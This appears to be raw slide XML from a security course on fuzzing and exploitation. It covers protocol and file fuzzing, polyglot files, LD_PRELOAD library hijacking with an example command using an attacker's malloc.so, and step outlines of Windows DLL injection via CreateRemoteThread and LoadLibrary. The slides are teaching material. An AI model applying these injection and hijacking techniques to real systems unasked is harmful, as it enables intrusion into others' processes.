        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Shape 248"/>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b="1" lang="en"/>
              <a:t>Modeling Arbitrary Network Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What if SMTP or some other proprietary protocol is tunneled over HTTP to your web app?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>or over ssh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ad infinium</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Bit flipping for protocol headers / flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Fuzz with network time syncing protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>perhaps to attack crypto on a network service   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>:D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>in use since 1985</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lv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File types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>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shared objects, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>executable file formats, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>old file extension types (i.e. .php3 instead of .php)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>special folders (windows mainly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>magic numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>poly-type files!	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://code.google.com/p/corkami/downloads/detail?name=CorkaMIX.zip&amp;can=2&amp;q=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proof of Concept to generate a file that is a valid PE, PDF, HTML (+ java script), AND .JAR (with Python) file!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Shape 255"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6736833" y="4117732"/>
            <a:ext cx="1949967" cy="242715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A Fast File Fuzzer tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>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lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://rmadair.github.com/fuzzer/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Python based mutational file fuzzer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uses PyDBG to monitor for signals of interest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Client / Server architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>any number of clients can connect to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>each client handles some portion of the fuzzing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>creates mutated files clientside to fuzz a local copy of the target program with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can distribute fuzzing in a cloud like fashion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>split up the set of all the things to fuzz over each client, and run them all in parallel</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Environment Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>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Are used by the user shell to do many things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Are located on the stack AND can be set from the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can be put into environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anyone in linux/unix systems can manipulate their environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In windows, requires administrator access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rt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Dynamically Linked Libraries &amp; LD_PRELOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>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b="1" lang="en" u="sng"/>
              <a:t>Linux/Unix only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prior to execution, dynamically linked libraries will be preloaded into memory.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The dynamic linker can be influenced into modifying its behavior either during the program's execution or program's linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>LD_LIBRARY_PATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>LD_PRELOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> are 2 common avenues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>LD_PRELOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is an environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can compile dynamic-link libraries with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>GCC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>-fpic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>linking with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>-shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If you set LD_PRELOAD to the path of a shared object, that file will be loaded </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>any other library (including C runtime, libc.so)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can rewrite malloc for any target binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEEEE"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ LD_PRELOAD=/attacker's/path/to/malloc.so target_program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Also possible with debugger tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" mar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DLL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>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Technique for running code within the address space of another process by forcing it to load a dynamic-link library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>at *least* 4 well known methods on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>every process that links to User32.dll will load all the DLLs listed here (disabled with windows Vista and beyond)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Process manipulation functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>API functions to inject DLL after it starts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>i.e. CreateRemoteThread </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Basic approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Get handle for target process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>allocate memory in target process for DLL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>create new thread in target process, with a start address at LoadLibrary with the argument of the DLL to inject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Then the OS call DllMain in the injected DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Windows Hooking Calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Debugging tools (ollydbg, immunity, etc)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First the news...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Shape 107"/>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lang="en" sz="2400"/>
              <a:t>Iranian Fordow uranium enrichment facility suffers massive explosion, trapped 240 scientists underground</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.reuters.com/article/2013/01/28/us-iran-nuclear-idUSBRE90R06820130128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.wnd.com/2013/01/sabotage-key-iranian-nuclear-facility-hit/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.telegraph.co.uk/news/worldnews/middleeast/iran/9831282/Mystery-over-explosion-at-Irans-Fordow-nuclear-site.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>I'll just let you guys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>                   speculate...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Shape 108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230943" y="3289043"/>
            <a:ext cx="3455857" cy="318743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Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>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lang="en"/>
              <a:t>Goal is to determine the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>exploitability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>of bugs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>requires memory analysis, some reverse engineering, and payload crafting... along with creativity and a lot of thought</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It mainly comes down to reverse engineering the application some and testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>No accurate tools exist for vuln analysis.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!exploitable (http://msecdbg.codeplex.com/) </a:t>
            </a:r>
          </a:p>
          <a:p>
